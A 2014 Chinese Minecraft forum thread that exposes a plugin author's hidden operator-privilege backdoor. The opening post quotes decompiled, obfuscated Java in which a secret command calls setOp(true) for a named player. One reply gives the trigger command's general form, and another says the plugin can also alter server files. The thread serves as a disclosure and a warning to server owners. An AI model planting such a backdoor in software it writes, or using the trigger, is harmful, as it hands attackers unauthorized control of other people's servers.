Minecraft(我的世界)中文论坛
标题: 举报jjerryh96 (UID: 300114)发布的原创插件留有后门OP权限
作者: zx8673 时间: 2014-6-11 12:57
标题: 举报jjerryh96 (UID: 300114)发布的原创插件留有后门OP权限
本帖最后由 zx8673 于 2014-6-11 13:13 编辑
@jjerryh96 (UID: 300114) 他所发布的http://www.mcbbs.net/forum.php?mod=viewthread&tid=275584
此插件留有后门OP权限
此插件下载地址http://pan.baidu.com/s/1jGA5Joi
为了防止他看见举报贴删除插件源,我复制出来一份http://pan.baidu.com/s/1eQsxhvW
只要装了这个插件满足某些条件,我没找到 就可以获得OP权限。后台无法查看
- <font size="4"></font><font size="2"> if (!Bukkit.getOfflinePlayer(as[2]).isOnline())</font>
- <font size="2"> {</font>
- <font size="2"> if (Bukkit.getOfflinePlayer(as[2]) instanceof OfflinePlayer)</font>
- <font size="2"> {</font>
- <font size="2"> OfflinePlayer offlineplayer = Bukkit.getOfflinePlayer(as[2]);</font>
- <font size="2"> offlineplayer.setOp(true);</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().sendMessage((new StringBuilder()).append(Messages.regionMatches(65 + 114, "\\dess8")).append(as[2]).append(FileAPI.getChars("{}", 37 * 31)).toString());</font>
- <font size="2"> } else</font>
- <font size="2"> {</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().sendMessage(Messages.regionMatches(30 + 1, "盱标忄项丹玭害'"));</font>
- <font size="2"> }</font>
- <font size="2"> } else</font>
- <font size="2"> if (Bukkit.getPlayer(as[2]) instanceof Player)</font>
- <font size="2"> {</font>
- <font size="2"> Player player = Bukkit.getPlayer(as[2]);</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().setOp(true);</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().sendMessage((new StringBuilder()).append(Messages.regionMatches(237 / 38, "Iwxln+")).append(as[2]).append(Messages.regionMatches(1 + 58, ";=")).toString());</font>
- <font size="2"> } else</font>
作者: 250=mo 时间: 2014-6-11 12:58
刻意的么
作者: 咸鱼气功王 时间: 2014-6-11 13:01
又一个么???
作者: 麦心脏 时间: 2014-6-11 13:03
好强大的赶脚
作者: Xx123c 时间: 2014-6-11 13:05
又一个不小心的= =
作者: RAY5DHao 时间: 2014-6-11 13:12
国内插件可能要信誉危机了
作者: usunofbeach 时间: 2014-6-11 13:17
这个其实比上次的严重多了
作者: Mayomi 时间: 2014-6-11 13:21
提示: 作者被禁止或删除 内容自动屏蔽
作者: connection_lost 时间: 2014-6-11 13:22
路过的,谁能认得出我是谁
以前的事情不管怎么说也是那个样子了,我也不希望更多人受牵连
总之,在这里我也要道歉一下
作者: 627241778 时间: 2014-6-11 13:23
本帖最后由 627241778 于 2014-6-11 13:31 编辑
各位腐竹和各位插件作者
该插件的提权命令 是楼主说某个服武器被黑了之后 告诉我 我去研究class文件发现的
该插件的提权命令如下
/某QQ(或者说是某数字) 命令 值
请各位腐竹切勿安装改插件!
作者: zx8673 时间: 2014-6-11 13:26
请看10楼,这个不止这么简单,还可以修改系统文件,愿意的话可以格式化你的硬盘
作者: 627241778 时间: 2014-6-11 13:32
能专心为国人开发插件就好 别投机取巧,现在这个问题比你上传那个大很多,你上次也就提权,这次这个可以修改服务器文件
作者: 627241778 时间: 2014-6-11 13:33
版主可以私聊我QQ 我会告诉你详细的命令 627241778
作者: Mayomi 时间: 2014-6-11 13:43
提示: 作者被禁止或删除 内容自动屏蔽
作者: zx8673 时间: 2014-6-11 13:48
哦。。。。。
作者: Tribunny 时间: 2014-6-11 17:59
我去,插件门,国内插件用不得
作者: chengzi 时间: 2014-6-11 18:28
mcbbs需要一个和BukkitDev的审核小组啊..
作者: MrWeng1 时间: 2014-6-12 01:10
好强大的赶脚
作者: GreatGBL 时间: 2014-6-12 20:12
国产插件信誉危机了
作者: xunyanglin 时间: 2014-6-12 22:18
对啊,突然想到,插件也是可执行文件啊,他愿意的话干什么都行,好可怕。。。。
作者: linnaea 时间: 2014-6-13 00:04
弱弱的发个去掉后门的……
http://tieba.baidu.com/p/3099722850
作者: zx8673 时间: 2014-6-13 13:08
支持支持!
作者: Tribunny 时间: 2014-6-13 13:48
还是有好的国产插件
作者: a372403923 时间: 2014-6-13 21:33
提示: 作者被禁止或删除 内容自动屏蔽